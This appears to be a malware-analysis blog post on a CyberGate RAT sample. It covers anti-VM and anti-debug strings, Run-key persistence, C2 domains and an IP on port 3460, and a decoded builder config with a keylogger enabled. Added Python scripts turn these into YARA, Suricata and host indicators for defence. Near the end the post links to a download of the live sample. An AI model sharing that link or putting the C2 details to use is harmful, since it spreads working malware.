<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2FCGHLB8NV4i7mq4sI65a3T0FBVwtJleZoLo7TUn18k89HVALylrDbsOI6obZv6TCyhJv4wNnzRATgvh1c3MlCz9kl8XrHN6JL6nrScg5zb9UVi7DJKswK6wN8iaUR2eKDmtTE4BSf-A/s1600/vt2.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2FCGHLB8NV4i7mq4sI65a3T0FBVwtJleZoLo7TUn18k89HVALylrDbsOI6obZv6TCyhJv4wNnzRATgvh1c3MlCz9kl8XrHN6JL6nrScg5zb9UVi7DJKswK6wN8iaUR2eKDmtTE4BSf-A/s1600/vt2.jpg" /></a></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Interesting strings:</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Anti-VM</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407AB3 MOV EAX,1.00407B40 ASCII "VBoxService.exe"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B40 ASCII "VBoxService.exe",0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B53 PUSH 1.00407B68 ASCII "SbieDll.dll"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B68 ASCII "SbieDll.dll",0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B77 PUSH 1.00407B8C ASCII "dbghelp.dll"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B8C ASCII "dbghelp.dll",0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407BA6 PUSH 1.00407C00 ASCII "Software\Microsoft\Windows\CurrentVersion"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407BCF PUSH 1.00407C2C ASCII "ProductId"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407BE2 CMP EAX,1.00407C38 ASCII "55274-640-2673064-23950"</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Anti-Debugging</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407EA6 PUSH 1.00407ED4 ASCII "IsDebuggerPresent"</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408798 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">004087E1 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040880F MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408858 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408890 MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">004088D9 MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408911 MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040895A MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">004089D4 ASCII "\",0</span></div>
</div>
<div>
<br /></div>
</div>
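<div style="text-align: left;"><span style="font-family: "arial" , "helvetica" , sans-serif;">As an added example (not code from the post), the Python script below parses OllyDbg-style referenced-string lines like the ones above, groups the anti-VM, anti-debugging and persistence strings the way the post does, and writes a YARA rule from them; the input is a constructed sample built from the strings listed above, and the function names and the rule's "3 of them" threshold are my own choices.</span></div>

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in OllyDbg's "referenced strings" format, built from the strings
# the post lists for the unpacked CyberGate sample (same addresses as shown there).
SAMPLE_LINES = r'''
00407AB3 MOV EAX,1.00407B40 ASCII "VBoxService.exe"
00407B40 ASCII "VBoxService.exe",0
00407B53 PUSH 1.00407B68 ASCII "SbieDll.dll"
00407B77 PUSH 1.00407B8C ASCII "dbghelp.dll"
00407BA6 PUSH 1.00407C00 ASCII "Software\Microsoft\Windows\CurrentVersion"
00407BCF PUSH 1.00407C2C ASCII "ProductId"
00407BE2 CMP EAX,1.00407C38 ASCII "55274-640-2673064-23950"
00407EA6 PUSH 1.00407ED4 ASCII "IsDebuggerPresent"
00408798 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
004087E1 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
00408890 MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040895A MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
'''

# <addr> [<instruction with a module.dataaddr operand>] ASCII|UNICODE "<text>"[,0]
LINE_RE = re.compile(
    r'^(?P<addr>[0-9A-F]{8})\s+(?P<rest>.*?)(?P<enc>ASCII|UNICODE)\s+"(?P<text>.*?)"(?:,0)?\s*$'
)
# Operand such as "1.00407B40" or "Dumped.00411D88": module name, dot, data address.
REF_RE = re.compile(r'(\w+)\.([0-9A-F]{8})')

# Substring indicators grouped the way the post groups them (matched case-insensitively);
# the fixed ProductId value is a hard-coded sandbox fingerprint the sample compares against.
INDICATORS = {
    "anti_vm": ["VBoxService.exe", "SbieDll.dll", "dbghelp.dll",
                "ProductId", "55274-640-2673064-23950"],
    "anti_debug": ["IsDebuggerPresent"],
    "persistence": [r"\CurrentVersion\Run", r"\Policies\Explorer\Run"],
}


@dataclass
class StringRef:
    addr: str       # address of the referencing instruction (or of the data line itself)
    ref: str        # address of the string data
    encoding: str   # "ASCII" or "UNICODE"
    text: str
    category: Optional[str]


def classify(text: str) -> Optional[str]:
    """Indicator category for a string, or None if it is not one we track."""
    low = text.lower()
    for category, needles in INDICATORS.items():
        if any(n.lower() in low for n in needles):
            return category
    return None


def parse_refs(dump: str) -> List[StringRef]:
    """Parse the listing, keeping one entry per string address: a string is usually
    referenced from several instructions (each Run key appears four times in the
    post), so de-duplicating on the data address avoids repeats in the rule."""
    seen: Dict[str, StringRef] = {}
    for raw in dump.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ref_m = REF_RE.search(m.group("rest"))
        ref = ref_m.group(2) if ref_m else m.group("addr")  # data line: its own address
        if ref not in seen:
            seen[ref] = StringRef(m.group("addr"), ref, m.group("enc"),
                                  m.group("text"), classify(m.group("text")))
    return list(seen.values())


def triage(refs: List[StringRef]) -> Dict[str, List[str]]:
    """Group tracked strings by category, in order of first appearance."""
    out: Dict[str, List[str]] = {c: [] for c in INDICATORS}
    for r in refs:
        if r.category:
            out[r.category].append(r.text)
    return out


def yara_rule(name: str, refs: List[StringRef]) -> str:
    """Emit a YARA rule over the tracked strings (UNICODE references become 'wide')."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, r in enumerate(r for r in refs if r.category):
        esc = r.text.replace("\\", "\\\\").replace('"', '\\"')
        mod = "wide" if r.encoding == "UNICODE" else "ascii"
        lines.append(f'        $s{i} = "{esc}" {mod}  // {r.category}')
    # Threshold chosen for this example: several strings must co-occur, so a benign
    # binary that merely imports IsDebuggerPresent does not match.
    lines += ["    condition:", "        uint16(0) == 0x5A4D and 3 of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    refs = parse_refs(SAMPLE_LINES)
    print(triage(refs))
    print(yara_rule("cybergate_unpacked_strings", refs))
```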
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">In the dynamic analysis we see where it connects and how it persists on the system.</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Hidden file:</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6iHMjcDCFdhFUyKZ4fz-h5FiqYOcyJiwn0gl9HS5gr0Y4-hiw7ZFs1rMEQVn-o8Zu70K96NSNLXy2tdtMZc0PFN5vZVIb0e6qR6_Aie4vQep64lzZsi39rp8tjA9XxfAjoSlK1JaXhDw/s1600/03.jpg" imageanchor="1"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHJGK962yp7aAHbPc_6b5l1gWvqO6LHvOouAfz5LwqZpmhIDDOxYhgE4QEzDC773D7e9aPeoMCC-Imijhlvv1dixNIseCHcjaXUHLYPqTHY1sGYAgobVspzFiMmhr0KpMg6hNQPUGnykw/s1600/04.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHJGK962yp7aAHbPc_6b5l1gWvqO6LHvOouAfz5LwqZpmhIDDOxYhgE4QEzDC773D7e9aPeoMCC-Imijhlvv1dixNIseCHcjaXUHLYPqTHY1sGYAgobVspzFiMmhr0KpMg6hNQPUGnykw/s1600/04.jpg" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6iHMjcDCFdhFUyKZ4fz-h5FiqYOcyJiwn0gl9HS5gr0Y4-hiw7ZFs1rMEQVn-o8Zu70K96NSNLXy2tdtMZc0PFN5vZVIb0e6qR6_Aie4vQep64lzZsi39rp8tjA9XxfAjoSlK1JaXhDw/s1600/03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6iHMjcDCFdhFUyKZ4fz-h5FiqYOcyJiwn0gl9HS5gr0Y4-hiw7ZFs1rMEQVn-o8Zu70K96NSNLXy2tdtMZc0PFN5vZVIb0e6qR6_Aie4vQep64lzZsi39rp8tjA9XxfAjoSlK1JaXhDw/s1600/03.jpg" /></a></div>
<div style="text-align: left;">
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">Network Traffic</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">DNS Requests</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">unshowmas.ddns.net<span class="Apple-tab-span" style="white-space: pre;"> </span>181.131.80.198<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">analaloca.chickenkiller.com<span class="Apple-tab-span" style="white-space: pre;"> </span>181.131.80.198<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">unshowmas.no-ip.biz<span class="Apple-tab-span" style="white-space: pre;"> </span>181.131.80.198<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Contacted Hosts</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">191.90.223.133<span class="Apple-tab-span" style="white-space: pre;"> </span>3460<span class="Apple-tab-span" style="white-space: pre;"> </span>TCP<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">The RAT injects itself into a Firefox.exe process; dumping that process and then extracting its strings, we find the following:</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">(for this we can use the Sysinternals suite)</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
unshowmas.no-ip.biz</div>
<div>
ALOCA.CHICKENKILLER.COM</div>
<div>
unshowmas.no-ip.biz</div>
<div>
stem\CurrentControlSet\Services\Tcpip\Parameters</div>
<div>
cybergate</div>
<div>
<br /></div>
<div>
CyberGate </div>
<div>
v1.18.0 - Trial version</div>
<div>
.txt</div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We now know it is the CyberGate RAT trojan, so we can run a config decoder to see what data we get.</span></div>
<div>
<br /></div>
<div>
https://github.com/kevthehermit/RATDecoders/blob/master/CyberGate.py</div>
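<div><span style="font-family: "arial" , "helvetica" , sans-serif;">As an added example (not code from the post or from RATDecoders), this Python snippet parses the Key/Value listing the decoder prints, pairs the pipe-delimited Domain and Port fields into C2 endpoints, pulls out the host-side indicators a responder would pivot on, and writes a Suricata DNS rule per C2 domain; the input is constructed from the values shown below, and the function names and SIDs are placeholders of my own.</span></div>

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt of the decoder's Key/Value listing for this sample, copied from
# the values shown in the post (tab-separated fields, pipe-delimited multi-value lists).
SAMPLE_CONFIG = (
    "Key: Activate Keylogger\t Value: TRUE\n"
    "Key: Domain\t Value: analaloca.chickenkiller.com|unshowmas.ddns.net|unshowmas.no-ip.biz|\n"
    "Key: Install File Name\t Value: logonwindows.exe\n"
    "Key: Melt File\t Value: TRUE\n"
    "Key: Mutex\t Value: J00OO266V861S3\n"
    "Key: Persistance\t Value: TRUE\n"
    "Key: Port\t Value: 3460|3460|3460|\n"
    "Key: Process Injection\t Value: Disabled\n"
)

LINE_RE = re.compile(r"^Key:\s*(?P<key>.+?)\s*Value:\s*(?P<value>.*)$")


def parse_config(text: str) -> Dict[str, str]:
    """Turn the decoder's 'Key: X <tab> Value: Y' lines into a dict (empty values kept)."""
    cfg: Dict[str, str] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            cfg[m.group("key")] = m.group("value").strip()
    return cfg


def split_multi(value: str) -> List[str]:
    """Split a pipe-delimited field; the builder leaves a trailing '|', so drop empties."""
    return [v for v in value.split("|") if v]


def c2_endpoints(cfg: Dict[str, str]) -> List[Tuple[str, int]]:
    """Pair domain i with port i (both are stored as parallel pipe-lists).

    If fewer ports than domains were configured, reuse the last port rather than
    silently drop a host from the indicator list.
    """
    hosts = split_multi(cfg.get("Domain", ""))
    ports = [int(p) for p in split_multi(cfg.get("Port", "")) if p.isdigit()]
    out: List[Tuple[str, int]] = []
    for i, host in enumerate(hosts):
        port = ports[i] if i < len(ports) else (ports[-1] if ports else 0)
        out.append((host, port))
    return out


def flag(cfg: Dict[str, str], key: str) -> bool:
    return cfg.get(key, "").upper() == "TRUE"


def host_indicators(cfg: Dict[str, str]) -> Dict[str, object]:
    """Host-side facts worth pivoting on, plus the builder's behaviour switches."""
    return {
        "mutex": cfg.get("Mutex", ""),
        "install_file": cfg.get("Install File Name", ""),
        "keylogger": flag(cfg, "Activate Keylogger"),
        "persistence": flag(cfg, "Persistance"),   # key name as the decoder spells it
        "melt": flag(cfg, "Melt File"),             # dropper deletes itself after install
        # "Disabled" here, although the post observed the RAT inside Firefox.exe:
        # treat builder switches as hints, not as ground truth for the running sample.
        "process_injection": cfg.get("Process Injection", "").lower() == "enabled",
    }


def suricata_rules(endpoints: List[Tuple[str, int]], sid_start: int = 1000001) -> List[str]:
    """One Suricata (5+) DNS-query rule per C2 domain; SIDs are placeholders here."""
    rules = []
    for i, (host, _port) in enumerate(endpoints):
        rules.append(
            "alert dns $HOME_NET any -> any any "
            f'(msg:"CyberGate C2 domain lookup {host}"; dns.query; '
            f'content:"{host}"; nocase; sid:{sid_start + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print(c2_endpoints(cfg))
    print(host_indicators(cfg))
    print("\n".join(suricata_rules(c2_endpoints(cfg))))
```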
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Activate Keylogger<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Active X Startup<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: {O8WU086S-76RM-CBK3-8KVD-3P1LU050V080}</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Change Creation Date<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: CyberGate Version<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Domain<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: analaloca.chickenkiller.com|unshowmas.ddns.net|unshowmas.no-ip.biz|</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Enable Message Box<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: FALSE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Address<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: ftp.server.com</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Directory<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: ./logs</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Interval<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 30</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Password<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: password</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Port<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 21</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP UserName<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: ftp_user</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Google Chrome Passwords<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Hide File<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Directory<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: install</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install File Name<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: logonwindows.exe</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Flag<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Message Box<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: Remote Administration anywhere in the world.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Message Title<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: CyberGate</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Keylogger Backspace = Delete<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Keylogger Enable FTP<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: FALSE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Melt File<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Message Box Button<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Message Box Icon<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 16</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Mutex<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: J00OO266V861S3</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: P2P Spread<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Password<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: cybergate</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Persistance<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Port<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 3460|3460|3460|</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Process Injection<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: Disabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: REG Key HKCU<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: HKCU</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: REG Key HKLM<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: HKLM</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: ServerID<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: FOTO</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Startup Policies<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: Policies</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: USB Spread<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
</div>
<div style="text-align: left;">
</div>
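<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">As an added example (not code from the post or from CyberGate itself), the following Python script turns a Key/Value builder dump like the one above into the artifacts a responder would hunt for on a host: the mutex, the dropped file name, the persistence hives and the C2 ports. The sample lines are copied from the dump above; the fragment-to-indicator mapping and the assumption that "Install Directory" is relative to a base folder chosen by the RAT are mine.</span></div>

```python
import re

# Constructed sample: lines in the same "Key: ... Value: ..." shape as the CyberGate
# builder configuration dumped above (values copied from that dump; tabs as in the post).
SAMPLE_CONFIG = """\
Key: Hide File\t Value: TRUE
Key: Install Directory\t Value: install
Key: Install File Name\t Value: logonwindows.exe
Key: Install Flag\t Value: TRUE
Key: Melt File\t Value: TRUE
Key: Mutex\t Value: J00OO266V861S3
Key: Password\t Value: cybergate
Key: Persistance\t Value: TRUE
Key: Port\t Value: 3460|3460|3460|
Key: Process Injection\t Value: Disabled
Key: REG Key HKCU\t Value: HKCU
Key: REG Key HKLM\t Value: HKLM
Key: Startup Policies\t Value: Policies
Key: USB Spread\t Value:
"""

LINE_RE = re.compile(r"^Key:\s*(?P<key>.+?)\s+Value:\s*(?P<value>.*)$")


def parse_config(text):
    """Turn the Key/Value dump into a dict; blank values become None."""
    cfg = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            cfg[m["key"].strip()] = m["value"].strip() or None
    return cfg


def is_true(value):
    return (value or "").upper() == "TRUE"


def host_indicators(cfg):
    """Derive what a responder should look for on a host from the builder settings."""
    install_dir = cfg.get("Install Directory") or ""
    file_name = cfg.get("Install File Name") or ""
    # "Port" is a pipe-separated list, often with repeats and a trailing separator.
    ports = sorted({p for p in (cfg.get("Port") or "").split("|") if p.isdigit()}, key=int)
    hives = [cfg[k] for k in ("REG Key HKCU", "REG Key HKLM") if cfg.get(k)]
    return {
        "mutex": cfg.get("Mutex"),
        # Assumption: "install" is relative to a base folder the RAT picks at install
        # time, so hunt by file name rather than by a fixed absolute path.
        "dropped_file": "\\".join(p for p in (install_dir, file_name) if p) or None,
        "hidden_attribute": is_true(cfg.get("Hide File")),
        "dropper_deleted": is_true(cfg.get("Melt File")),  # original sample removes itself
        "persistence_hives": hives if is_true(cfg.get("Persistance")) else [],
        "startup_policy_key": cfg.get("Startup Policies"),
        "process_injection": (cfg.get("Process Injection") or "").lower() == "enabled",
        "c2_ports": ports,
        "usb_spread": is_true(cfg.get("USB Spread")),
    }


if __name__ == "__main__":
    for key, value in host_indicators(parse_config(SAMPLE_CONFIG)).items():
        print(f"{key:20s} {value}")
```

<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Because "Melt File" is TRUE, the original dropper will no longer be on disk; the mutex name, the Run-key value and the listening port 3460 are the durable artifacts to check.</span></div>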
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Social engineering, the order of the day, and the .... curious ones...</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sample: </span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://www.dropbox.com/s/xk35wu39i3v2n3k/Malware%20-%20cybergate-16-12-15.rar?dl=0</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">That's all for now.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">@Dkavalanche 2015</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1QZRWItGrF8h3ZwbczZvi8Kj8avVWazjcKWvBJuTb6VQhXo3aXrHTu43hcwhnSgRUsFAMsPOp2lKyGp8sBM4aPFdtpeNdehirNkfW5wKw80o_QQW8UyF0oH2diXx2Ec59jg4a108s2W8/s1600/descarga.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1QZRWItGrF8h3ZwbczZvi8Kj8avVWazjcKWvBJuTb6VQhXo3aXrHTu43hcwhnSgRUsFAMsPOp2lKyGp8sBM4aPFdtpeNdehirNkfW5wKw80o_QQW8UyF0oH2diXx2Ec59jg4a108s2W8/s400/descarga.jpg" /></a></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
